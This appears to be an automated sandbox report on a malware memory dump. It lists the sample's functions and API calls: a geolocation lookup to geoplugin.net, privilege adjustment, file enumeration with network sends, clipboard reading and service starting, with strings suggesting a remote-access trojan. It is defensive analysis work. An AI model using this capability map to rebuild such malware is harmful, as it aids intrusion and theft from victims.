GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513

Strings

['E, xrefs: 004524F3, 004524CA
OCP, xrefs: 00452490
ACP, xrefs: 0045245A

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP$['E
API String ID: 2299586839-2532616801
Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398

Uniqueness

Uniqueness Score: -1.00%

Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
InternetCloseHandle.WININET(00000000), ref: 0041B41C
InternetCloseHandle.WININET(00000000), ref: 0041B41F

Strings

http://geoplugin.net/json.gp, xrefs: 0041B3B7

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
OpenProcessToken.ADVAPI32(00000000), ref: 00417966
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
GetLastError.KERNEL32 ref: 0041799D

Strings

SeShutdownPrivilege, xrefs: 00417972

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409258

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
FindClose.KERNEL32(00000000), ref: 004093C1

Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C

FindClose.KERNEL32(00000000), ref: 004095B9

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
String ID:
API String ID: 2435342581-0
Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592

Sleep.KERNEL32(00000BB8), ref: 0040F85B
ExitProcess.KERNEL32 ref: 0040F8CA

Strings

pth_unenc, xrefs: 0040F7BD, 0040F804, 0040F871
override, xrefs: 0040F7CC
4.9.4 Pro, xrefs: 0040F836, 0040F8A3

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 4.9.4 Pro$override$pth_unenc
API String ID: 2281282204-930821335
Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF

Uniqueness

Uniqueness Score: -1.00%

Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3

Strings

SETTINGS, xrefs: 0041B4AC

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040966A
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408811
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
__CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

XPG, xrefs: 0040793A
XPG, xrefs: 00407877

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: XPG$XPG
API String ID: 4113138495-1962359302
Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7

Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1

Strings

TileWallpaper, xrefs: 0041CAC1
WallpaperStyle, xrefs: 0041CA22, 0041CA55, 0041CAA5
Control Panel\Desktop, xrefs: 0041CA1D, 0041CA50, 0041CAA0

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF

Uniqueness

Uniqueness Score: -1.00%

Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Strings

PkGNG, xrefs: 004461F2

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85

Uniqueness

Uniqueness Score: -1.00%

Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040B711
GetClipboardData.USER32(0000000D), ref: 0040B71D
CloseClipboard.USER32 ref: 0040B725

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082

Strings

lJD, xrefs: 0045203B

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604

Uniqueness

Uniqueness Score: -1.00%

Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940

Strings

GetLocaleInfoEx, xrefs: 00448908

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E

Uniqueness

Uniqueness Score: -1.00%

Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698

Uniqueness

Uniqueness Score: -1.00%

Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897

EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

Uniqueness

Uniqueness Score: -1.00%

